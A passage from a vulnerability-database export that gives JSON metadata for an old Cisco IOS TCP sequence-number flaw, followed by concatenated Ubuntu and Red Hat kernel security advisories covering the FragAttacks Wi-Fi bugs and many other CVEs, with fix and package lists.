      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2001-0288",
        "trust": 2.2
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050",
        "trust": 0.9
      },
      {
        "db": "CISCO",
        "id": "20010228 CISCO IOS SOFTWARE TCP INITIAL SEQUENCE NUMBER RANDOMIZATION IMPROVEMENTS",
        "trust": 0.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#498440",
        "trust": 0.3
      },
      {
        "db": "BID",
        "id": "2682",
        "trust": 0.3
      },
      {
        "db": "IVD",
        "id": "C8F9CA16-23CE-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "19522",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "id": "VAR-200105-0093",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      }
    ],
    "trust": 0.03
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.2
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:48:32.133000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.cisco.com/warp/public/707/ios-tcp-isn-random-pub.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://razor.bindview.com/publish/papers/tcpseq.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.kb.cert.org/vuls/id/498440"
      },
      {
        "trust": 0.3,
        "url": "https://library.e.abb.com/public/03edbe8b0bed400a8b294347be5d66ab/abb_softwarevulnerabilityhandlingadvisory_abb-vu-pgga-1kgt090284.pdf"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "db": "BID",
        "id": "2682"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2001-05-03T00:00:00",
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2001-05-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "date": "2001-03-14T00:00:00",
        "db": "BID",
        "id": "2682"
      },
      {
        "date": "2001-05-03T04:00:00",
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "date": "2001-05-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-09-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-3110"
      },
      {
        "date": "2016-10-26T05:08:00",
        "db": "BID",
        "id": "2682"
      },
      {
        "date": "2008-09-05T20:23:44.790000",
        "db": "NVD",
        "id": "CVE-2001-0288"
      },
      {
        "date": "2005-05-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Switch and router vulnerabilities",
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "unknown",
    "sources": [
      {
        "db": "IVD",
        "id": "c8f9ca16-23ce-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-050"
      }
    ],
    "trust": 0.8
  }
}

var-202105-1432
Vulnerability from variot

The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that all fragments of a frame are encrypted under the same key. An adversary can abuse this to decrypt selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP encryption key is periodically renewed. IEEE 802.11 The standard has vulnerabilities regarding cryptographic strength.Information may be obtained. A flaw was found in the Linux kernel's WiFi implementation. An attacker within the wireless range can abuse a logic flaw in the WiFi implementation by reassembling packets from multiple fragments under different keys, treating them as valid. This flaw allows an malicious user to send a fragment under an incorrect key, treating them as a valid fragment under the new key. The highest threat from this vulnerability is to confidentiality. ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021

linux-kvm vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 21.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-kvm: Linux kernel for cloud environments

Details:

USN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04.

Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)

Or Cohen discovered that the SCTP implementation in the Linux kernel contained a race condition in some situations, leading to a use-after-free condition. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-31829)

It was discovered that a race condition in the kernel Bluetooth subsystem could lead to use-after-free of slab objects. An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)

It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)

It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4997-2 https://ubuntu.com/security/notices/USN-4997-1 CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139, CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133, CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399, CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543, CVE-2021-3609

Package Information: https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9

. 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):

2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2021:4356-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:4356 Issue date: 2021-11-09 CVE Names: CVE-2020-0427 CVE-2020-24502 CVE-2020-24503 CVE-2020-24504 CVE-2020-24586 CVE-2020-24587 CVE-2020-24588 CVE-2020-26139 CVE-2020-26140 CVE-2020-26141 CVE-2020-26143 CVE-2020-26144 CVE-2020-26145 CVE-2020-26146 CVE-2020-26147 CVE-2020-27777 CVE-2020-29368 CVE-2020-29660 CVE-2020-36158 CVE-2020-36386 CVE-2021-0129 CVE-2021-3348 CVE-2021-3489 CVE-2021-3564 CVE-2021-3573 CVE-2021-3600 CVE-2021-3635 CVE-2021-3659 CVE-2021-3679 CVE-2021-3732 CVE-2021-20194 CVE-2021-20239 CVE-2021-23133 CVE-2021-28950 CVE-2021-28971 CVE-2021-29155 CVE-2021-29646 CVE-2021-29650 CVE-2021-31440 CVE-2021-31829 CVE-2021-31916 CVE-2021-33200 ==================================================================== 1.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64

Security Fix(es): * kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427) * kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24502) * kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24503) * kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers (CVE-2020-24504) * kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586) * kernel: Reassembling fragments encrypted under different keys (CVE-2020-24587) * kernel: wifi frame payload being parsed incorrectly as an L2 frame (CVE-2020-24588) * kernel: Forwarding EAPOL from unauthenticated wifi client (CVE-2020-26139) * kernel: accepting plaintext data frames in protected networks (CVE-2020-26140) * kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141) * kernel: accepting fragmented plaintext frames in protected networks (CVE-2020-26143) * kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header (CVE-2020-26144) * kernel: accepting plaintext broadcast fragments as full frames (CVE-2020-26145) * kernel: powerpc: RTAS calls can be used to compromise kernel integrity (CVE-2020-27777) * kernel: locking inconsistency in tty_io.c and tty_jobctrl.c can lead to a read-after-free (CVE-2020-29660) * kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function via a long SSID value (CVE-2020-36158) * kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() (CVE-2020-36386) * kernel: Improper access control in BlueZ may allow information disclosure vulnerability. (CVE-2021-0129) * kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c (CVE-2021-3348) * kernel: Linux kernel eBPF RINGBUF map oversized allocation (CVE-2021-3489) * kernel: double free in bluetooth subsystem when the HCI device initialization fails (CVE-2021-3564) * kernel: use-after-free in function hci_sock_bound_ioctl() (CVE-2021-3573) * kernel: eBPF 32-bit source register truncation on div/mod (CVE-2021-3600) * kernel: DoS in rb_per_cpu_empty() (CVE-2021-3679) * kernel: Mounting overlayfs inside an unprivileged user namespace can reveal files (CVE-2021-3732) * kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() (CVE-2021-20194) * kernel: Race condition in sctp_destroy_sock list_del (CVE-2021-23133) * kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode (CVE-2021-28950) * kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c (CVE-2021-28971) * kernel: protection can be bypassed to leak content of kernel memory (CVE-2021-29155) * kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c (CVE-2021-29646) * kernel: lack a full memory barrier may lead to DoS (CVE-2021-29650) * kernel: local escalation of privileges in handling of eBPF programs (CVE-2021-31440) * kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory (CVE-2021-31829) * kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier (CVE-2021-33200) * kernel: reassembling encrypted fragments with non-consecutive packet numbers (CVE-2020-26146) * kernel: reassembling mixed encrypted/plaintext fragments (CVE-2020-26147) * kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368) * kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 (CVE-2021-3635) * kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c (CVE-2021-3659) * kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure (CVE-2021-20239) * kernel: out of bounds array access in drivers/md/dm-ioctl.c (CVE-2021-31916)

  1. Solution:

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1509204 - dlm: Add ability to set SO_MARK on DLM sockets 1793880 - Unreliable RTC synchronization (11-minute mode) 1816493 - [RHEL 8.3] Discard request from mkfs.xfs takes too much time on raid10 1900844 - CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity 1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 1906522 - CVE-2020-29660 kernel: locking inconsistency in drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c can lead to a read-after-free 1912683 - CVE-2021-20194 kernel: heap overflow in __cgroup_bpf_run_filter_getsockopt() 1913348 - CVE-2020-36158 kernel: buffer overflow in mwifiex_cmd_802_11_ad_hoc_start function in drivers/net/wireless/marvell/mwifiex/join.c via a long SSID value 1915825 - Allow falling back to genfscon labeling when the FS doesn't support xattrs and there is a fs_use_xattr rule for it 1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. 1921958 - CVE-2021-3348 kernel: Use-after-free in ndb_queue_rq() in drivers/block/nbd.c 1923636 - CVE-2021-20239 kernel: setsockopt System Call Untrusted Pointer Dereference Information Disclosure 1930376 - CVE-2020-24504 kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810 Adapter drivers 1930379 - CVE-2020-24502 kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter drivers 1930381 - CVE-2020-24503 kernel: Insufficient access control in some Intel(R) Ethernet E810 Adapter drivers 1933527 - Files on cifs mount can get mixed contents when underlying file is removed but inode number is reused, when mounted with 'serverino' and 'cache=strict ' 1939341 - CNB: net: add inline function skb_csum_is_sctp 1941762 - CVE-2021-28950 kernel: fuse: stall on CPU can occur because a retry loop continually finds the same bad inode 1941784 - CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c 1945345 - CVE-2021-29646 kernel: improper input validation in tipc_nl_retrieve_key function in net/tipc/node.c 1945388 - CVE-2021-29650 kernel: lack a full memory barrier upon the assignment of a new table value in net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h may lead to DoS 1946965 - CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c 1948772 - CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del 1951595 - CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory 1953847 - [ethtool] The NLM_F_MULTI should be used for NLM_F_DUMP 1954588 - RHEL kernel 8.2 and higher are affected by data corruption bug in raid1 arrays using bitmaps. 1957788 - CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory 1959559 - CVE-2021-3489 kernel: Linux kernel eBPF RINGBUF map oversized allocation 1959642 - CVE-2020-24586 kernel: Fragmentation cache not cleared on reconnection 1959654 - CVE-2020-24587 kernel: Reassembling fragments encrypted under different keys 1959657 - CVE-2020-24588 kernel: wifi frame payload being parsed incorrectly as an L2 frame 1959663 - CVE-2020-26139 kernel: Forwarding EAPOL from unauthenticated wifi client 1960490 - CVE-2020-26140 kernel: accepting plaintext data frames in protected networks 1960492 - CVE-2020-26141 kernel: not verifying TKIP MIC of fragmented frames 1960496 - CVE-2020-26143 kernel: accepting fragmented plaintext frames in protected networks 1960498 - CVE-2020-26144 kernel: accepting unencrypted A-MSDU frames that start with RFC1042 header 1960500 - CVE-2020-26145 kernel: accepting plaintext broadcast fragments as full frames 1960502 - CVE-2020-26146 kernel: reassembling encrypted fragments with non-consecutive packet numbers 1960504 - CVE-2020-26147 kernel: reassembling mixed encrypted/plaintext fragments 1960708 - please add CAP_CHECKPOINT_RESTORE to capability.h 1964028 - CVE-2021-31440 kernel: local escalation of privileges in handling of eBPF programs 1964139 - CVE-2021-3564 kernel: double free in bluetooth subsystem when the HCI device initialization fails 1965038 - CVE-2021-0129 kernel: Improper access control in BlueZ may allow information disclosure vulnerability. 1965360 - kernel: get_timespec64 does not ignore padding in compat syscalls 1965458 - CVE-2021-33200 kernel: out-of-bounds reads and writes due to enforcing incorrect limits for pointer arithmetic operations by BPF verifier 1966578 - CVE-2021-3573 kernel: use-after-free in function hci_sock_bound_ioctl() 1969489 - CVE-2020-36386 kernel: slab out-of-bounds read in hci_extended_inquiry_result_evt() in net/bluetooth/hci_event.c 1971101 - ceph: potential data corruption in cephfs write_begin codepath 1972278 - libceph: allow addrvecs with a single NONE/blank address 1974627 - [TIPC] kernel BUG at lib/list_debug.c:31! 1975182 - CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer [rhel-8.5.0] 1975949 - CVE-2021-3659 kernel: NULL pointer dereference in llsec_key_alloc() in net/mac802154/llsec.c 1976679 - blk-mq: fix/improve io scheduler batching dispatch 1976699 - [SCTP]WARNING: CPU: 29 PID: 3165 at mm/page_alloc.c:4579 __alloc_pages_slowpath+0xb74/0xd00 1976946 - CVE-2021-3635 kernel: flowtable list del corruption with kernel BUG at lib/list_debug.c:50 1976969 - XFS: followup to XFS sync to upstream v5.10 (re BZ1937116) 1977162 - [XDP] test program warning: libbpf: elf: skipping unrecognized data section(16) .eh_frame 1977422 - Missing backport of IMA boot aggregate calculation in rhel 8.4 kernel 1977537 - RHEL8.5: Update the kernel workqueue code to v5.12 level 1977850 - geneve virtual devices lack the NETIF_F_FRAGLIST feature 1978369 - dm writecache: sync with upstream 5.14 1979070 - Inaccessible NFS server overloads clients (native_queued_spin_lock_slowpath connotation?) 1979680 - Backport openvswitch tracepoints 1981954 - CVE-2021-3600 kernel: eBPF 32-bit source register truncation on div/mod 1986138 - Lockd invalid cast to nlm_lockowner 1989165 - CVE-2021-3679 kernel: DoS in rb_per_cpu_empty() 1989999 - ceph omnibus backport for RHEL-8.5.0 1991976 - block: fix New warning in nvme_setup_discard 1992700 - blk-mq: fix kernel panic when iterating over flush request 1995249 - CVE-2021-3732 kernel: overlayfs: Mounting overlayfs inside an unprivileged user namespace can reveal files 1996854 - dm crypt: Avoid percpu_counter spinlock contention in crypt_page_alloc()

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-348.el8.src.rpm

aarch64: bpftool-4.18.0-348.el8.aarch64.rpm bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-4.18.0-348.el8.aarch64.rpm kernel-core-4.18.0-348.el8.aarch64.rpm kernel-cross-headers-4.18.0-348.el8.aarch64.rpm kernel-debug-4.18.0-348.el8.aarch64.rpm kernel-debug-core-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-devel-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-4.18.0-348.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-devel-4.18.0-348.el8.aarch64.rpm kernel-headers-4.18.0-348.el8.aarch64.rpm kernel-modules-4.18.0-348.el8.aarch64.rpm kernel-modules-extra-4.18.0-348.el8.aarch64.rpm kernel-tools-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-4.18.0-348.el8.aarch64.rpm perf-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-348.el8.noarch.rpm kernel-doc-4.18.0-348.el8.noarch.rpm

ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm

x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

